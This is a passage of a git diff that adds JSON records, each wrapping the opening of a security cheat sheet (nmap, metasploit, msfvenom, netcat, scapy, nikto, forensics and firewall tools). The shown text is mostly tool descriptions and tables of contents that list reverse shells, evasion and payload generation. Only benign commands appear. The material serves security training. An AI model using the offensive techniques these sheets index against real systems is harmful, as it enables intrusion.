+ "description": "# Exploring IDS, IPS, Firewall, and Honeypot Solutions\n\nAmong the critical components of a comprehensive security strategy are Intrusion Detection Systems (IDS), Intrusion Prevention Systems (IPS), firewalls, and honeypots. Each plays a unique role in protecting networks and systems from malicious activities. \n\n### 1. **Intrusion Detection Systems (IDS)**\n\n**What is an IDS?**\nAn Intrusion Detection System (IDS) is designed to monitor network and system activities for malicious activities or poli",
+ "payloads": [
+ "# Exploring IDS, IPS, Firewall, and Honeypot Solutions",
+ "Among the critical components of a comprehensive security strategy are Intrusion Detection Systems (IDS), Intrusion Prevention Systems (IPS), firewalls, and honeypots. Each plays a unique role in protecting networks and systems from malicious activities.",
+ "### 1. **Intrusion Detection Systems (IDS)**",
+ "**What is an IDS?**",
+ "An Intrusion Detection System (IDS) is designed to monitor network and system activities for malicious activities or policy violations. Its primary function is to detect potential security breaches, including unauthorized access and misuse, and to alert administrators.",
+ "**Types of IDS:**",
+ "1. **Network-Based IDS (NIDS):**",
+ "- Monitors network traffic for signs of suspicious activity.",
+ "- Placed at key points in the network to analyze traffic patterns.",
+ "- Examples include Snort and Suricata.",
+ "2. **Host-Based IDS (HIDS):**",
+ "- Installed on individual hosts or devices to monitor system activities.",
+ "- Detects malicious activities or policy violations on the host.",
+ "- Examples include OSSEC and Tripwire.",
+ "**Key Features:**"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/certifications/additional_materials_for_certs/ids_ips_firewalls_honeypots.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cheat_sheets_06a1e621aef1.json b/skills/cheat_sheets_06a1e621aef1.json
new file mode 100644
index 0000000..26f4ccc
--- /dev/null
+++ b/skills/cheat_sheets_06a1e621aef1.json
@@ -0,0 +1,27 @@
+{
+ "id": "cheat_sheets_06a1e621aef1",
+ "category": "cheat-sheets",
+ "title": "scapy",
+ "description": "# Scapy Cheat Sheet\n\nScapy is a powerful Python-based interactive packet manipulation program and library. It can forge or decode packets, send them on the wire, capture them, and match requests and replies.\n\n## \ud83d\udccb Table of Contents\n- [Installation](#installation)\n- [Basic Usage](#basic-usage)\n- [Packet Creation](#packet-creation)\n- [Sending Packets](#sending-packets)\n- [Sniffing Packets](#sniffing-packets)\n- [Packet Manipulation](#packet-manipulation)\n- [Layer Operations](#layer-operations)\n- [C",
+ "payloads": [
+ "# Scapy Cheat Sheet",
+ "Scapy is a powerful Python-based interactive packet manipulation program and library. It can forge or decode packets, send them on the wire, capture them, and match requests and replies.",
+ "## \ud83d\udccb Table of Contents",
+ "- [Installation](#installation)",
+ "- [Basic Usage](#basic-usage)",
+ "- [Packet Creation](#packet-creation)",
+ "- [Sending Packets](#sending-packets)",
+ "- [Sniffing Packets](#sniffing-packets)",
+ "- [Packet Manipulation](#packet-manipulation)",
+ "- [Layer Operations](#layer-operations)",
+ "- [Common Protocols](#common-protocols)",
+ "- [Network Scanning](#network-scanning)",
+ "- [Attack Simulations](#attack-simulations)",
+ "- [Advanced Techniques](#advanced-techniques)",
+ "## Installation"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cheat-sheets/networking/scapy.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cheat_sheets_0b1cd5824214.json b/skills/cheat_sheets_0b1cd5824214.json
new file mode 100644
index 0000000..223a649
--- /dev/null
+++ b/skills/cheat_sheets_0b1cd5824214.json
@@ -0,0 +1,27 @@
+{
+ "id": "cheat_sheets_0b1cd5824214",
+ "category": "cheat-sheets",
+ "title": "nmap",
+ "description": "# NMAP Cheat Sheet\n\nNmap (Network Mapper) is a powerful open-source tool for network discovery and security auditing. It's essential for penetration testing, network inventory, and security assessments.\n\n## \ud83d\udccb Table of Contents\n- [Basic Syntax](#basic-syntax)\n- [Target Specification](#target-specification)\n- [Port Specification](#port-specification)\n- [Port Status](#port-status)\n- [Scan Types](#scan-types)\n- [Host Discovery](#host-discovery)\n- [Timing Options](#timing-options)\n- [Evasion Techniqu",
+ "payloads": [
+ "# NMAP Cheat Sheet",
+ "Nmap (Network Mapper) is a powerful open-source tool for network discovery and security auditing. It's essential for penetration testing, network inventory, and security assessments.",
+ "## \ud83d\udccb Table of Contents",
+ "- [Basic Syntax](#basic-syntax)",
+ "- [Target Specification](#target-specification)",
+ "- [Port Specification](#port-specification)",
+ "- [Port Status](#port-status)",
+ "- [Scan Types](#scan-types)",
+ "- [Host Discovery](#host-discovery)",
+ "- [Timing Options](#timing-options)",
+ "- [Evasion Techniques](#evasion-techniques)",
+ "- [Nmap Scripting Engine (NSE)](#nmap-scripting-engine-nse)",
+ "- [Output Options](#output-options)",
+ "- [Practical Examples](#practical-examples)",
+ "## Basic Syntax"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cheat-sheets/networking/nmap.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cheat_sheets_179fded72e42.json b/skills/cheat_sheets_179fded72e42.json
new file mode 100644
index 0000000..a14c122
--- /dev/null
+++ b/skills/cheat_sheets_179fded72e42.json
@@ -0,0 +1,27 @@
+{
+ "id": "cheat_sheets_179fded72e42",
+ "category": "cheat-sheets",
+ "title": "metasploit",
+ "description": "# Metasploit Framework Cheat Sheet\n\nMetasploit is the world's most widely used penetration testing framework. It provides a comprehensive platform for developing, testing, and executing exploit code.\n\n## \ud83d\udccb Table of Contents\n- [Starting Metasploit](#starting-metasploit)\n- [Basic Commands](#basic-commands)\n- [Database Management](#database-management)\n- [Information Gathering](#information-gathering)\n- [Scanning and Enumeration](#scanning-and-enumeration)\n- [Exploitation](#exploitation)\n- [Post-Ex",
+ "payloads": [
+ "# Metasploit Framework Cheat Sheet",
+ "Metasploit is the world's most widely used penetration testing framework. It provides a comprehensive platform for developing, testing, and executing exploit code.",
+ "## \ud83d\udccb Table of Contents",
+ "- [Starting Metasploit](#starting-metasploit)",
+ "- [Basic Commands](#basic-commands)",
+ "- [Database Management](#database-management)",
+ "- [Information Gathering](#information-gathering)",
+ "- [Scanning and Enumeration](#scanning-and-enumeration)",
+ "- [Exploitation](#exploitation)",
+ "- [Post-Exploitation](#post-exploitation)",
+ "- [Meterpreter](#meterpreter)",
+ "- [Payload Generation](#payload-generation)",
+ "- [Auxiliary Modules](#auxiliary-modules)",
+ "- [Evasion](#evasion)",
+ "## Starting Metasploit"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cheat-sheets/exploitation/metasploit.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cheat_sheets_27265809de98.json b/skills/cheat_sheets_27265809de98.json
new file mode 100644
index 0000000..a06adac
--- /dev/null
+++ b/skills/cheat_sheets_27265809de98.json
@@ -0,0 +1,27 @@
+{
+ "id": "cheat_sheets_27265809de98",
+ "category": "cheat-sheets",
+ "title": "powershell",
+ "description": "# PowerShell for Cybersecurity Cheat Sheet\n\nPowerShell is a powerful scripting language and command-line shell built on .NET. It's essential for Windows system administration and security testing.\n\n## \ud83d\udccb Table of Contents\n- [Basic Commands](#basic-commands)\n- [Variables and Data Types](#variables-and-data-types)\n- [Control Flow](#control-flow)\n- [Functions](#functions)\n- [File Operations](#file-operations)\n- [Network Operations](#network-operations)\n- [System Information](#system-information)\n- [",
+ "payloads": [
+ "# PowerShell for Cybersecurity Cheat Sheet",
+ "PowerShell is a powerful scripting language and command-line shell built on .NET. It's essential for Windows system administration and security testing.",
+ "## \ud83d\udccb Table of Contents",
+ "- [Basic Commands](#basic-commands)",
+ "- [Variables and Data Types](#variables-and-data-types)",
+ "- [Control Flow](#control-flow)",
+ "- [Functions](#functions)",
+ "- [File Operations](#file-operations)",
+ "- [Network Operations](#network-operations)",
+ "- [System Information](#system-information)",
+ "- [Active Directory](#active-directory)",
+ "- [Security Commands](#security-commands)",
+ "- [Post-Exploitation](#post-exploitation)",
+ "## Basic Commands",
+ "### Getting Help"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cheat-sheets/windows/powershell.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cheat_sheets_29fc7e42f8f4.json b/skills/cheat_sheets_29fc7e42f8f4.json
new file mode 100644
index 0000000..df28bf5
--- /dev/null
+++ b/skills/cheat_sheets_29fc7e42f8f4.json
@@ -0,0 +1,27 @@
+{
+ "id": "cheat_sheets_29fc7e42f8f4",
+ "category": "cheat-sheets",
+ "title": "NMAP cheat sheet",
+ "description": "# NMAP Cheat Sheet\n\nNmap (Network Mapper) is a powerful open-source tool for network discovery and security auditing. It's essential for penetration testing, network inventory, and security assessments.\n\n## \ud83d\udccb Table of Contents\n- [Basic Syntax](#basic-syntax)\n- [Target Specification](#target-specification)\n- [Port Specification](#port-specification)\n- [Port Status](#port-status)\n- [Scan Types](#scan-types)\n- [Host Discovery](#host-discovery)\n- [Timing Options](#timing-options)\n- [Evasion Techniqu",
+ "payloads": [
+ "# NMAP Cheat Sheet",
+ "Nmap (Network Mapper) is a powerful open-source tool for network discovery and security auditing. It's essential for penetration testing, network inventory, and security assessments.",
+ "## \ud83d\udccb Table of Contents",
+ "- [Basic Syntax](#basic-syntax)",
+ "- [Target Specification](#target-specification)",
+ "- [Port Specification](#port-specification)",
+ "- [Port Status](#port-status)",
+ "- [Scan Types](#scan-types)",
+ "- [Host Discovery](#host-discovery)",
+ "- [Timing Options](#timing-options)",
+ "- [Evasion Techniques](#evasion-techniques)",
+ "- [Nmap Scripting Engine (NSE)](#nmap-scripting-engine-nse)",
+ "- [Output Options](#output-options)",
+ "- [Practical Examples](#practical-examples)",
+ "## Basic Syntax"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cheat-sheets/NMAP_cheat_sheet.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cheat_sheets_2d14d7e03d37.json b/skills/cheat_sheets_2d14d7e03d37.json
new file mode 100644
index 0000000..942dd96
--- /dev/null
+++ b/skills/cheat_sheets_2d14d7e03d37.json
@@ -0,0 +1,17 @@
+{
+ "id": "cheat_sheets_2d14d7e03d37",
+ "category": "cheat-sheets",
+ "title": "awk",
+ "description": "# awk cheatsheets\nThe following are a collection of cheatsheets of the awk Linux Command:\n- https://www.shortcutfoo.com/app/dojos/awk/cheatsheet\n- https://catonmat.net/ftp/awk.cheat.sheet.pdf\n- https://shinnok.com/cheatsheets/programming-scripting/awk/awk_cheatsheet.pdf\n",
+ "payloads": [
+ "# awk cheatsheets",
+ "The following are a collection of cheatsheets of the awk Linux Command:",
+ "- https://www.shortcutfoo.com/app/dojos/awk/cheatsheet",
+ "- https://catonmat.net/ftp/awk.cheat.sheet.pdf",
+ "- https://shinnok.com/cheatsheets/programming-scripting/awk/awk_cheatsheet.pdf"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cheat-sheets/scripting/awk.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cheat_sheets_2fa9a5dc347c.json b/skills/cheat_sheets_2fa9a5dc347c.json
new file mode 100644
index 0000000..08056ed
--- /dev/null
+++ b/skills/cheat_sheets_2fa9a5dc347c.json
@@ -0,0 +1,27 @@
+{
+ "id": "cheat_sheets_2fa9a5dc347c",
+ "category": "cheat-sheets",
+ "title": "user management",
+ "description": "# User Management Basic Commands\nThere are several commands that are crucial when managing users in Linux. Here are some of the most important ones:\n\n1. `useradd`: This command is used to create a new user. For example: `useradd username`\n\n2. `usermod`: This command modifies the properties of an existing user. For example, to add a user to a group: `usermod -aG groupname username`\n\n3. `userdel`: This command deletes a user. For example: `userdel username`. Be careful with this command, it should",
+ "payloads": [
+ "# User Management Basic Commands",
+ "There are several commands that are crucial when managing users in Linux. Here are some of the most important ones:",
+ "1. `useradd`: This command is used to create a new user. For example: `useradd username`",
+ "2. `usermod`: This command modifies the properties of an existing user. For example, to add a user to a group: `usermod -aG groupname username`",
+ "3. `userdel`: This command deletes a user. For example: `userdel username`. Be careful with this command, it should be used with caution.",
+ "4. `passwd`: This command is used to change the user's password. For example, to change the password for a user: `passwd username`",
+ "5. `su`: This command is used to switch the current user to another user. For example, to switch to a user named \"username\", you would type: `su username`",
+ "6. `sudo`: This command is used to run commands with administrative privileges. For example: `sudo command`. It's equivalent to saying \"run this command as the superuser\".",
+ "7. `chown`: This command is used to change the owner of a file or directory. For example: `chown username filename`",
+ "8. `chgrp`: This command is used to change the group of a file or directory. For example: `chgrp groupname filename`",
+ "9. `groups`: This command is used to display the groups a user is a part of. For example: `groups username`",
+ "10. `id`: This command is used to display the user ID and group ID of a user. For example: `id username`",
+ "11. `whoami`: This command is used to display the current logged in user. Just type: `whoami`",
+ "12. `adduser`: This command is used to add a user (more user friendly than `useradd`). For example: `adduser username`",
+ "13. `addgroup`: This command is used to add a group. For example: `addgroup groupname`"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cheat-sheets/linux/user_management.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cheat_sheets_36a1449666bb.json b/skills/cheat_sheets_36a1449666bb.json
new file mode 100644
index 0000000..8b60ee8
--- /dev/null
+++ b/skills/cheat_sheets_36a1449666bb.json
@@ -0,0 +1,27 @@
+{
+ "id": "cheat_sheets_36a1449666bb",
+ "category": "cheat-sheets",
+ "title": "volatility",
+ "description": "# Volatility Memory Forensics Cheat Sheet\n\nVolatility is an open-source memory forensics framework for incident response and malware analysis. It extracts digital artifacts from volatile memory (RAM) dumps.\n\n## \ud83d\udccb Table of Contents\n- [Installation](#installation)\n- [Basic Usage](#basic-usage)\n- [Image Identification](#image-identification)\n- [Process Analysis](#process-analysis)\n- [Network Analysis](#network-analysis)\n- [Registry Analysis](#registry-analysis)\n- [Malware Detection](#malware-detect",
+ "payloads": [
+ "# Volatility Memory Forensics Cheat Sheet",
+ "Volatility is an open-source memory forensics framework for incident response and malware analysis. It extracts digital artifacts from volatile memory (RAM) dumps.",
+ "## \ud83d\udccb Table of Contents",
+ "- [Installation](#installation)",
+ "- [Basic Usage](#basic-usage)",
+ "- [Image Identification](#image-identification)",
+ "- [Process Analysis](#process-analysis)",
+ "- [Network Analysis](#network-analysis)",
+ "- [Registry Analysis](#registry-analysis)",
+ "- [Malware Detection](#malware-detection)",
+ "- [File Extraction](#file-extraction)",
+ "- [Timeline Analysis](#timeline-analysis)",
+ "- [Advanced Analysis](#advanced-analysis)",
+ "## Installation",
+ "```bash"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cheat-sheets/forensics/volatility.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cheat_sheets_4bb27e34b372.json b/skills/cheat_sheets_4bb27e34b372.json
new file mode 100644
index 0000000..9e51a6a
--- /dev/null
+++ b/skills/cheat_sheets_4bb27e34b372.json
@@ -0,0 +1,27 @@
+{
+ "id": "cheat_sheets_4bb27e34b372",
+ "category": "cheat-sheets",
+ "title": "tcpdump",
+ "description": "# Tcpdump Cheat Sheet\n\nTcpdump is a powerful command-line packet analyzer tool used for network troubleshooting and security analysis. It captures and displays packets being transmitted or received over a network.\n\n## \ud83d\udccb Table of Contents\n- [Basic Syntax](#basic-syntax)\n- [Interface Selection](#interface-selection)\n- [Basic Captures](#basic-captures)\n- [Filtering Traffic](#filtering-traffic)\n- [Protocol Filters](#protocol-filters)\n- [Port Filters](#port-filters)\n- [Host Filters](#host-filters)\n- ",
+ "payloads": [
+ "# Tcpdump Cheat Sheet",
+ "Tcpdump is a powerful command-line packet analyzer tool used for network troubleshooting and security analysis. It captures and displays packets being transmitted or received over a network.",
+ "## \ud83d\udccb Table of Contents",
+ "- [Basic Syntax](#basic-syntax)",
+ "- [Interface Selection](#interface-selection)",
+ "- [Basic Captures](#basic-captures)",
+ "- [Filtering Traffic](#filtering-traffic)",
+ "- [Protocol Filters](#protocol-filters)",
+ "- [Port Filters](#port-filters)",
+ "- [Host Filters](#host-filters)",
+ "- [Advanced Filters](#advanced-filters)",
+ "- [Output Options](#output-options)",
+ "- [Reading Captures](#reading-captures)",
+ "- [Practical Examples](#practical-examples)",
+ "## Basic Syntax"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cheat-sheets/networking/tcpdump.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cheat_sheets_8f58c7bd30d9.json b/skills/cheat_sheets_8f58c7bd30d9.json
new file mode 100644
index 0000000..8d2597a
--- /dev/null
+++ b/skills/cheat_sheets_8f58c7bd30d9.json
@@ -0,0 +1,27 @@
+{
+ "id": "cheat_sheets_8f58c7bd30d9",
+ "category": "cheat-sheets",
+ "title": "ufw",
+ "description": "# UFW: Uncomplicated Firewall \u2014 Cheat Sheet\n\n## Installation\nIf you are using Ubuntu then UFW will be installed by default. If you are using Debian or a derivative, then you can install UFW by entering the following\n```\nroot@host:~# apt-get install ufw\n```\n\nUFW is not available in CentOS, and although you can install it from source, that is outside the scope of this tutorial.\n\n## Checking status\nWhen you check the status, UFW will either tell you that it is inactive,\n\n```\nroot@host:~# ufw status",
+ "payloads": [
+ "# UFW: Uncomplicated Firewall \u2014 Cheat Sheet",
+ "## Installation",
+ "If you are using Ubuntu then UFW will be installed by default. If you are using Debian or a derivative, then you can install UFW by entering the following",
+ "root@host:~# apt-get install ufw",
+ "UFW is not available in CentOS, and although you can install it from source, that is outside the scope of this tutorial.",
+ "## Checking status",
+ "When you check the status, UFW will either tell you that it is inactive,",
+ "root@host:~# ufw status",
+ "Status: inactive",
+ "or it will tell you it is active and list the firewall rules.",
+ "root@host:~# ufw status",
+ "Status: active",
+ "To Action From",
+ "-- ------ ----",
+ "22/tcp ALLOW Anywhere"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cheat-sheets/firewall/ufw.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cheat_sheets_9bf703fff17c.json b/skills/cheat_sheets_9bf703fff17c.json
new file mode 100644
index 0000000..041444f
--- /dev/null
+++ b/skills/cheat_sheets_9bf703fff17c.json
@@ -0,0 +1,27 @@
+{
+ "id": "cheat_sheets_9bf703fff17c",
+ "category": "cheat-sheets",
+ "title": "linux metacharacters",
+ "description": "# Linux metacharacters\n\n1. `;` : Separates commands.\n ```\n command1 ; command2 # Run command1, then run command2 regardless of whether command1 succeeded.\n ```\n\n2. `&` : Background execution.\n ```\n command & # Runs \"command\" in the background.\n ```\n\n3. `&&` : AND operator.\n ```\n command1 && command2 # Run command1, then run command2 only if command1 succeeded.\n ```\n\n4. `||` : OR operator.\n ```\n command1 || command2 # Run command1, then run command2 only if comman",
+ "payloads": [
+ "# Linux metacharacters",
+ "1. `;` : Separates commands.",
+ "command1 ; command2 # Run command1, then run command2 regardless of whether command1 succeeded.",
+ "2. `&` : Background execution.",
+ "command & # Runs \"command\" in the background.",
+ "3. `&&` : AND operator.",
+ "command1 && command2 # Run command1, then run command2 only if command1 succeeded.",
+ "4. `||` : OR operator.",
+ "command1 || command2 # Run command1, then run command2 only if command1 failed.",
+ "5. `|` : Pipe operator.",
+ "command1 | command2 # Output of command1 is passed as input to command2.",
+ "6. `()` : Command group.",
+ "(command1; command2) # Group commands into a subshell.",
+ "7. `{}` : Command block.",
+ "{ command1; command2; } # Group commands in the current shell."
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cheat-sheets/linux/linux_metacharacters.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cheat_sheets_9c4dfec9a190.json b/skills/cheat_sheets_9c4dfec9a190.json
new file mode 100644
index 0000000..a4a00a1
--- /dev/null
+++ b/skills/cheat_sheets_9c4dfec9a190.json
@@ -0,0 +1,27 @@
+{
+ "id": "cheat_sheets_9c4dfec9a190",
+ "category": "cheat-sheets",
+ "title": "nikto",
+ "description": "# Nikto Cheat Sheet\n\nNikto is an open-source web server vulnerability scanner used to identify potential security issues in web applications and servers. Below is a cheat sheet highlighting its key features and commands.\n\n**NOTE**: Check out the [Nikto lab](https://learning.oreilly.com/scenarios/ethical-hacking-scenarios/9780137673469X003) in O'Reilly. It is listed at: https://hackingscenarios.com\n\n### 1. **Basic Nikto Commands**\n\n- **Scan a Host**: `nikto -h ` \n Initiates a basic scan against",
+ "payloads": [
+ "# Nikto Cheat Sheet",
+ "Nikto is an open-source web server vulnerability scanner used to identify potential security issues in web applications and servers. Below is a cheat sheet highlighting its key features and commands.",
+ "**NOTE**: Check out the [Nikto lab](https://learning.oreilly.com/scenarios/ethical-hacking-scenarios/9780137673469X003) in O'Reilly. It is listed at: https://hackingscenarios.com",
+ "### 1. **Basic Nikto Commands**",
+ "- **Scan a Host**: `nikto -h `",
+ "Initiates a basic scan against a specified target URL.",
+ "- **Scan Specific Ports**: `nikto -h -p ,`",
+ "Scans the target on specified ports.",
+ "- **Use SSL**: `nikto -h -ssl`",
+ "Enables SSL scanning for HTTPS services.",
+ "- **Save Output**: `nikto -h -o `",
+ "Saves scan results to a specified file.",
+ "### 2. **Advanced Options**",
+ "- **Specify Host Header**: `nikto -h -host `",
+ "Sets the Host header for the request."
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cheat-sheets/web-testing/nikto.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cheat_sheets_a1d3ed80cf67.json b/skills/cheat_sheets_a1d3ed80cf67.json
new file mode 100644
index 0000000..2e1a442
--- /dev/null
+++ b/skills/cheat_sheets_a1d3ed80cf67.json
@@ -0,0 +1,27 @@
+{
+ "id": "cheat_sheets_a1d3ed80cf67",
+ "category": "cheat-sheets",
+ "title": "wireshark filters",
+ "description": "# Wireshark Display Filters Cheat Sheet\n\nWireshark is the world's most popular network protocol analyzer. Display filters allow you to focus on specific traffic during analysis.\n\n## \ud83d\udccb Table of Contents\n- [Wireshark Display Filters Cheat Sheet](#wireshark-display-filters-cheat-sheet)\n - [\ud83d\udccb Table of Contents](#-table-of-contents)\n - [Basic Syntax](#basic-syntax)\n - [Comparison Operators](#comparison-operators)\n - [Logical Operators](#logical-operators)\n - [Protocol Filters](#protocol-filters)",
+ "payloads": [
+ "# Wireshark Display Filters Cheat Sheet",
+ "Wireshark is the world's most popular network protocol analyzer. Display filters allow you to focus on specific traffic during analysis.",
+ "## \ud83d\udccb Table of Contents",
+ "- [Wireshark Display Filters Cheat Sheet](#wireshark-display-filters-cheat-sheet)",
+ "- [\ud83d\udccb Table of Contents](#-table-of-contents)",
+ "- [Basic Syntax](#basic-syntax)",
+ "- [Comparison Operators](#comparison-operators)",
+ "- [Logical Operators](#logical-operators)",
+ "- [Protocol Filters](#protocol-filters)",
+ "- [IP Filters](#ip-filters)",
+ "- [TCP Filters](#tcp-filters)",
+ "- [UDP Filters](#udp-filters)",
+ "- [HTTP Filters](#http-filters)",
+ "- [DNS Filters](#dns-filters)",
+ "- [TLS/SSL Filters](#tlsssl-filters)"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cheat-sheets/networking/wireshark-filters.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cheat_sheets_a2ce299a3659.json b/skills/cheat_sheets_a2ce299a3659.json
new file mode 100644
index 0000000..2a388af
--- /dev/null
+++ b/skills/cheat_sheets_a2ce299a3659.json
@@ -0,0 +1,27 @@
+{
+ "id": "cheat_sheets_a2ce299a3659",
+ "category": "cheat-sheets",
+ "title": "netcat",
+ "description": "# Netcat (nc) Cheat Sheet\n\nNetcat is often referred to as the \"Swiss Army knife\" of networking tools. It can read and write data across network connections using TCP or UDP protocols.\n\n## \ud83d\udccb Table of Contents\n- [Basic Syntax](#basic-syntax)\n- [Connection Modes](#connection-modes)\n- [Port Scanning](#port-scanning)\n- [File Transfers](#file-transfers)\n- [Banner Grabbing](#banner-grabbing)\n- [Reverse Shells](#reverse-shells)\n- [Bind Shells](#bind-shells)\n- [Port Forwarding](#port-forwarding)\n- [Proxy",
+ "payloads": [
+ "# Netcat (nc) Cheat Sheet",
+ "Netcat is often referred to as the \"Swiss Army knife\" of networking tools. It can read and write data across network connections using TCP or UDP protocols.",
+ "## \ud83d\udccb Table of Contents",
+ "- [Basic Syntax](#basic-syntax)",
+ "- [Connection Modes](#connection-modes)",
+ "- [Port Scanning](#port-scanning)",
+ "- [File Transfers](#file-transfers)",
+ "- [Banner Grabbing](#banner-grabbing)",
+ "- [Reverse Shells](#reverse-shells)",
+ "- [Bind Shells](#bind-shells)",
+ "- [Port Forwarding](#port-forwarding)",
+ "- [Proxying](#proxying)",
+ "- [Chat Server](#chat-server)",
+ "- [Advanced Techniques](#advanced-techniques)",
+ "## Basic Syntax"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cheat-sheets/networking/netcat.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cheat_sheets_af101795b7f7.json b/skills/cheat_sheets_af101795b7f7.json
new file mode 100644
index 0000000..c692e1e
--- /dev/null
+++ b/skills/cheat_sheets_af101795b7f7.json
@@ -0,0 +1,27 @@
+{
+ "id": "cheat_sheets_af101795b7f7",
+ "category": "cheat-sheets",
+ "title": "ORGANIZATION",
+ "description": "# Cheat Sheets Organization Summary\n\nThis document provides an overview of how the cheat sheets directory has been organized and improved.\n\n## \ud83d\udcca Overview\n\nThe cheat sheets have been completely reorganized from a collection of PDFs and scattered markdown files into a well-structured, comprehensive knowledge base with all content in markdown format.\n\n## \ud83d\uddc2\ufe0f New Directory Structure\n\n```\ncheat-sheets/\n\u251c\u2500\u2500 README.md # Main navigation and overview\n\u251c\u2500\u2500 ORGANIZATION.md # This ",
+ "payloads": [
+ "# Cheat Sheets Organization Summary",
+ "This document provides an overview of how the cheat sheets directory has been organized and improved.",
+ "## \ud83d\udcca Overview",
+ "The cheat sheets have been completely reorganized from a collection of PDFs and scattered markdown files into a well-structured, comprehensive knowledge base with all content in markdown format.",
+ "## \ud83d\uddc2\ufe0f New Directory Structure",
+ "cheat-sheets/",
+ "\u251c\u2500\u2500 README.md # Main navigation and overview",
+ "\u251c\u2500\u2500 ORGANIZATION.md # This file",
+ "\u251c\u2500\u2500 networking/ # Network tools and protocols",
+ "\u2502 \u251c\u2500\u2500 nmap.md # Comprehensive Nmap guide",
+ "\u2502 \u251c\u2500\u2500 netcat.md # Netcat/Ncat usage",
+ "\u2502 \u251c\u2500\u2500 tcpdump.md # Packet capture with tcpdump",
+ "\u2502 \u251c\u2500\u2500 tshark.md # Terminal Wireshark",
+ "\u2502 \u251c\u2500\u2500 wireshark-filters.md # Wireshark display filters",
+ "\u2502 \u251c\u2500\u2500 scapy.md # Python packet manipulation"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cheat-sheets/ORGANIZATION.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cheat_sheets_bbca7371de4a.json b/skills/cheat_sheets_bbca7371de4a.json
new file mode 100644
index 0000000..f902b7a
--- /dev/null
+++ b/skills/cheat_sheets_bbca7371de4a.json
@@ -0,0 +1,27 @@
+{
+ "id": "cheat_sheets_bbca7371de4a",
+ "category": "cheat-sheets",
+ "title": "msfvenom",
+ "description": "# Msfvenom Payload Generator Cheat Sheet\n\nMsfvenom is a combination of Msfpayload and Msfencode, used to generate and encode payloads for the Metasploit Framework.\n\n## \ud83d\udccb Table of Contents\n- [Basic Usage](#basic-usage)\n- [Windows Payloads](#windows-payloads)\n- [Linux Payloads](#linux-payloads)\n- [MacOS Payloads](#macos-payloads)\n- [Web Payloads](#web-payloads)\n- [Scripting Payloads](#scripting-payloads)\n- [Mobile Payloads](#mobile-payloads)\n- [Encoders](#encoders)\n- [Formats](#formats)\n- [Advance",
+ "payloads": [
+ "# Msfvenom Payload Generator Cheat Sheet",
+ "Msfvenom is a combination of Msfpayload and Msfencode, used to generate and encode payloads for the Metasploit Framework.",
+ "## \ud83d\udccb Table of Contents",
+ "- [Basic Usage](#basic-usage)",
+ "- [Windows Payloads](#windows-payloads)",
+ "- [Linux Payloads](#linux-payloads)",
+ "- [MacOS Payloads](#macos-payloads)",
+ "- [Web Payloads](#web-payloads)",
+ "- [Scripting Payloads](#scripting-payloads)",
+ "- [Mobile Payloads](#mobile-payloads)",
+ "- [Encoders](#encoders)",
+ "- [Formats](#formats)",
+ "- [Advanced Techniques](#advanced-techniques)",
+ "## Basic Usage",
+ "```bash"
+ ],
+ "source": "h4cker",
+ "references": [
+ "/workspaces/hunter-skill/h4cker/cheat-sheets/exploitation/msfvenom.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/cheat_sheets_c5eb0fb23b61.json b/skills/cheat_sheets_c5eb0fb23b61.json
new file mode 100644
index 0000000..337d612
--- /dev/null
+++ b/skills/cheat_sheets_c5eb0fb23b61.json
@@ -0,0 +1,27 @@
+{
+ "id": "cheat_sheets_c5eb0fb23b61",
+ "category": "cheat-sheets",
+ "title": "bash",
+ "description": "# Bash Scripting for Cybersecurity\n\nBash (Bourne Again Shell) is a powerful scripting language used extensively in Linux/Unix systems for automation and security tasks.\n\n## \ud83d\udccb Table of Contents\n- [Basic Syntax](#basic-syntax)\n- [Variables](#variables)\n- [Input/Output](#inputoutput)\n- [Conditionals](#conditionals)\n- [Loops](#loops)\n- [Functions](#functions)\n- [File Operations](#file-operations)\n- [String Manipulation](#string-manipulation)\n- [Arrays](#arrays)\n- [Security Scripts](#security-scripts",
+ "payloads": [
+ "# Bash Scripting for Cybersecurity",
+ "Bash (Bourne Again Shell) is a powerful scripting language used extensively in Linux/Unix systems for automation and security tasks.",
+ "## \ud83d\udccb Table of Contents",
+ "- [Basic Syntax](#basic-syntax)",
+ "- [Variables](#variables)",
+ "- [Input/Output](#inputoutput)",
+ "- [Conditionals](#conditionals)",
